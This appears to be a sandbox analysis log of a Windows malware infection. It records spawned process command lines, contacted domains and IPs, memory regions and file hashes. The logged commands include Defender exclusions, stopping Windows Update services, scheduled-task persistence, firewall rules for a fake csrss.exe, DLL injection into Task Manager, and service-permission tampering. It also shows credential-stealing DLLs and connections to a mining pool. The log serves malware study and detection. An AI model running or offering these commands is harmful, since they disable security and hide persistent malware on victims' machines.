"C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp" /SL5="$50278,491750,408064,C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe"

C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe

"C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe"

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f4f8538,0x6f4f8548,0x6f4f8554

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe" --version

C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp

helper 105 0x3C8

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

"C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2512 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231005034119" --session-guid=1e9b6d0b-0d5b-4968-9490-bbdc142c9342 --server-tracking-blob=Y2JjZjcwMzk4YTkwMWE1YzUwZmE2MGZiZDZhZWNlMDgyMmQxZTIyY2IyNmRkMGEwYmFkNGQzZmRmNTFkNjg3OTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjQ3NzI3Mi42MDExIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJkMGU1YWMzNC0wOTZkLTQ0M2EtOTQwYS1kZmI3MWFmZDE2MjEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C04000000000000

C:\Users\Admin\AppData\Local\Temp\is-IUM7O.tmp\iAR3NEjxEx9jqAJE43HxlJxh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-IUM7O.tmp\iAR3NEjxEx9jqAJE43HxlJxh.tmp" /SL5="$801F8,5025136,832512,C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6dad8538,0x6dad8548,0x6dad8554

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 2240

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe

"C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe

"C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 716

C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp" /SL5="$302E6,833775,56832,C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe" --version

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x24c,0x250,0x254,0x248,0x224,0xa7e8a0,0xa7e8b0,0xa7e8bc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1085025563.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca

C:\Users\Admin\AppData\Local\Temp\1085025563.exe

"C:\Users\Admin\AppData\Local\Temp\1085025563.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 1808

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "zlwXiUU8CKJFMILgAs1ACet7.exe" /f & erase "C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "zlwXiUU8CKJFMILgAs1ACet7.exe" /f

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\1085025563.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe

"C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe"

C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe

"C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
DE 148.251.234.93:443 yip.su tcp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 d062.userscloud.net udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 104.21.93.225:443 flyawayaero.net tcp
DE 168.119.140.62:443 d062.userscloud.net tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
NL 13.227.219.122:443 downloads.digitalpulsedata.com tcp
US 8.8.8.8:53 link.storjshare.io udp
US 188.114.97.0:443 jetpackdelivery.net tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 172.67.187.122:443 lycheepanel.info tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 10.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 122.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 122.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 104.21.35.235:443 potatogoose.com tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.96.0:443 justsafepay.com tcp
RU 45.8.228.16:80 goboh2b.top tcp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 235.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 16.228.8.45.in-addr.arpa udp
US 136.0.77.2:80 link.storjshare.io tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.112:443 features.opera-api2.com tcp
NL 185.26.182.122:443 download.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.243:443 download3.operacdn.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 122.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 9.175.53.84.in-addr.arpa udp
US 8.8.8.8:53 243.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
NL 52.142.223.178:80 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 29.32.42.193.in-addr.arpa udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.96.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 link.storjshare.io udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
DE 52.219.170.250:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 250.170.219.52.in-addr.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 5.42.64.10:80 5.42.64.10 tcp
DE 5.75.216.44:27015 5.75.216.44 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 44.216.75.5.in-addr.arpa udp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 17.169.214.173.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 9f152af6-4f0a-4b6c-8108-21f7fa47c4e2.uuid.ramboclub.net udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server10.ramboclub.net udp
US 142.251.125.127:19302 stun1.l.google.com udp
BG 185.82.216.48:443 server10.ramboclub.net tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 mastertryprice.com udp
US 104.21.37.186:443 mastertryprice.com tcp
US 8.8.8.8:53 127.125.251.142.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 186.37.21.104.in-addr.arpa udp

Files

memory/4436-0-0x0000000000F40000-0x0000000000F78000-memory.dmp

memory/4436-1-0x00000000740B0000-0x000000007479E000-memory.dmp

memory/4436-2-0x0000000005870000-0x000000000590C000-memory.dmp

memory/4436-3-0x0000000005E10000-0x000000000630E000-memory.dmp

memory/4436-4-0x0000000005910000-0x00000000059A2000-memory.dmp

memory/4436-5-0x0000000005850000-0x0000000005860000-memory.dmp

memory/4436-6-0x00000000059E0000-0x00000000059EA000-memory.dmp

memory/4436-7-0x0000000005A60000-0x0000000005A8A000-memory.dmp

memory/4436-8-0x0000000005AC0000-0x0000000005ADA000-memory.dmp

memory/1596-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1596-13-0x00000000740B0000-0x000000007479E000-memory.dmp

memory/4436-12-0x00000000740B0000-0x000000007479E000-memory.dmp

memory/3820-15-0x00000000740B0000-0x000000007479E000-memory.dmp

memory/1596-16-0x00000000052D0000-0x00000000052E0000-memory.dmp

memory/3820-17-0x0000000000F00000-0x0000000000F36000-memory.dmp

memory/3820-19-0x00000000070B0000-0x00000000076D8000-memory.dmp

memory/3820-20-0x00000000012B0000-0x00000000012C0000-memory.dmp

memory/3820-18-0x00000000012B0000-0x00000000012C0000-memory.dmp

memory/3820-21-0x0000000006CD0000-0x0000000006CF2000-memory.dmp

memory/3820-22-0x0000000006F50000-0x0000000006FB6000-memory.dmp

memory/3820-23-0x00000000077E0000-0x0000000007846000-memory.dmp

memory/3820-24-0x0000000007850000-0x0000000007BA0000-memory.dmp

memory/3820-25-0x0000000006EE0000-0x0000000006EFC000-memory.dmp

memory/3820-26-0x0000000007BA0000-0x0000000007BEB000-memory.dmp

C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\gjwq6wInRiTi5nh9dyb8OlC6.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
